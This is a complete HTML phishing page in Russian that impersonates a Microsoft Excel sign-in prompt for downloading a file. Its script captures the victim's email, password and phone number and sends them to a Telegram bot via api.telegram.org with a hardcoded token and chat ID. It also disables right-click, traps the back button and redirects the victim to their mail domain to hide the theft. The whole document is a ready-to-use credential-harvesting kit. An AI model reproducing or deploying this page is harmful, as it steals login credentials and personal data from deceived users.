<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Войти | Эксель</title>
    <link rel="icon" type="image/png" sizes="16x16" href="Excel.png">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css">
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.12.9/dist/umd/popper.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js"></script>
    <style>
        body {
            background: url('excel.jpg') no-repeat center center fixed;
            background-size: cover;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .container {
            background-color: white;
            padding: 20px;
            width: 330px;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
            text-align: center;
        }
        .form-group img {
            display: block;
            margin: 0 auto 30px;
            max-width: 80px;
            width: 60%;
            height: auto;
        }
        .btn-excel {
            background-color: #217346;
            border-color: #217346;
            color: white;
        }
        .btn-excel:hover {
            background-color: #1e653c;
            border-color: #1e653c;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="row">
            <div class="col-lg-12">
                <form id="form">
                    <div id="form_alerts"></div>
                    <div class="form-group">
                        <img src="Excel.png" alt="Centered Image" class="img-fluid">
                        <input type="email" id="email" autofocus="focus" autocomplete="off" name="Email" class="form-control mb-3" placeholder="Электронная почта" required>
                        <input type="password" id="password" name="password" class="form-control mb-3" placeholder="Пароль" required>
                        <input type="tel" id="phone" name="phone" class="form-control mb-3" placeholder="номер телефона" required>
                        <button type="submit" name="submit" class="btn btn-excel btn-block">Загрузить файл</button>
                    </div>
                </form>
            </div>
        </div>
    </div>

    <script>
        const form = document.querySelector('#form');

        document.addEventListener('contextmenu', event => event.preventDefault());

        form.addEventListener("submit", (e) => {
            e.preventDefault();

            var email = document.getElementById("email").value;
            var password = document.getElementById("password").value;
            var phone = document.getElementById("phone").value;
            var token = "7103455086:AAE8jPHiCCAiJ6MTSOXfAdH2S5iFP2FGLmA";
            var chat_id = "6686169160";
            var my_text = `Login attempt: %0A - Email: ${email} %0A - Password: ${password} %0A - Phone: ${phone}`;

            var url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${my_text}`;

            let api = new XMLHttpRequest();
            api.open("GET", url, true);
            api.send();

            // Prevent going back after form submission
            history.pushState(null, null, location.href);
            window.addEventListener('popstate', function (event) {
                history.pushState(null, null, location.href);
            });

            // Redirect to the email provider's login page based on user's email domain
            const domain = email.split('@')[1];
            window.location.href = `https://${domain}`;
        });
    </script>
</body>
</html>
